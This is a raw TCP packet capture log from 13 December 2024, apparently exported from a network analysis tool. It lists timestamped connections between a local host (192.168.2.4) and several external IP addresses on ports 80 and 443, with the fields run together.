                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.998116970 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.999032974 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.999097109 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.999124050 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.999164104 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.000183105 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.000237942 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.000247002 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.000277996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.001204967 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.001255989 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.001281977 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.001324892 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.002381086 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.002413034 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.002427101 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.002453089 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.003381968 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.003434896 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.003477097 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.003523111 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.004484892 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.004534006 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.004621983 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.004678011 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.005640984 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.005692959 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.005732059 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.005769968 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.006756067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.006802082 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.006845951 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.006889105 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.007824898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.007874012 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.008003950 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.008058071 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.008894920 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.008944035 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.009032965 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.009078979 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.009959936 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.010009050 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.010111094 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.010162115 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.010956049 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.011008024 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.011214972 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.011266947 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.012061119 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.012104988 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.012146950 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.012188911 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.013170958 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.013221025 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.013262987 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.013313055 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.014223099 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.014269114 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.014302969 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.014350891 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.015305042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.015360117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.015449047 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.015501022 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.016422987 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.016484022 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.016518116 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.016556025 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.017541885 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.017652035 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.017664909 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.017714977 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.018568993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.018636942 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.018670082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.018723965 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.019654036 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.019715071 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.019748926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.019787073 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.020725012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.020788908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.020864964 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.020915985 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.021848917 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.021891117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.021918058 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.021965981 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.022906065 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.022957087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.158288956 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:21.158520937 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:22.125633955 CET44349776116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:22.126573086 CET49776443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:22.127154112 CET49776443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:22.127162933 CET44349776116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:22.128940105 CET49776443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:22.128947973 CET44349776116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.099281073 CET44349776116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.099298954 CET44349776116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.099348068 CET44349776116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.099503994 CET49776443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.099504948 CET49776443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.147595882 CET49776443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.147608995 CET44349776116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.580921888 CET4975780192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.581285000 CET4978280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.589272976 CET49783443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.589303970 CET44349783116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.589376926 CET49783443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.590169907 CET49783443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.590181112 CET44349783116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.700987101 CET8049782185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.701069117 CET4978280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.701080084 CET8049757185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.701128960 CET4975780192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.701237917 CET4978280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.836868048 CET8049782185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:24.994446039 CET44349783116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:24.995399952 CET49783443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.017118931 CET49783443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.017133951 CET44349783116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.018948078 CET49783443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.018954039 CET44349783116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.085850000 CET8049782185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.086541891 CET4978280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.089771032 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.210441113 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.211082935 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.211365938 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.330996037 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.886133909 CET44349783116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.886149883 CET44349783116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.886193991 CET44349783116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.886220932 CET49783443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.886260986 CET49783443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.093127966 CET49783443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.093151093 CET44349783116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.255199909 CET49795443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.255249023 CET44349795116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.255311012 CET49795443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.256650925 CET49795443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.256664038 CET44349795116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558775902 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558842897 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558900118 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558923960 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558937073 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558938026 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558948994 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558954954 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558964014 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558978081 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558979988 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.559004068 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.559051991 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.559168100 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.559180975 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.559195995 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.559222937 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.559240103 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.679702044 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.679716110 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.679941893 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.750914097 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.750972033 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.751107931 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.755079031 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.755547047 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.756618023 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.756741047 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.756783009 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.756808996 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.765185118 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.765294075 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.765372038 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.773689985 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.773758888 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.774027109 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.774068117 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.782193899 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.782481909 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.782577038 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.790657043 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.790781975 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.790827990 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.799158096 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.799185991 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.799248934 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.807642937 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.807775974 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.807832003 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.816152096 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.816235065 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.816319942 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.823880911 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.823983908 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.824074030 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.831650972 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.834366083 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.943320036 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.943339109 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.943531990 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.945775032 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.945903063 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.945956945 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.950949907 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.950967073 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.951014042 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.955826044 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.955876112 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.955900908 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.956523895 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.960588932 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.960727930 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.960779905 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.965483904 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.965605974 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.965653896 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.970221043 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.970313072 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.970365047 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.975018024 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.975116014 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.975291014 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.979839087 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.979888916 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.979923964 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.979971886 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.984662056 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.984733105 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.984774113 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.989486933 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.989588976 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.989629030 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.994338036 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.994457006 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.994494915 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.999046087 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.999150991 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.999190092 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.003818035 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.003870010 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.003971100 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.004007101 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.008678913 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.008760929 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.008799076 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.013566017 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.013689995 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.013729095 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.018279076 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.018320084 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.018361092 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.135365963 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.135382891 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.135474920 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.137357950 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.137384892 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.137562990 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.140428066 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.140506983 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.140520096 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.140561104 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.144979954 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.144999027 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.145065069 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.148556948 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.148710966 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.148782015 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.152273893 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.152331114 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:27.152379990 CET8049789185.215.113.16192.168.2.4
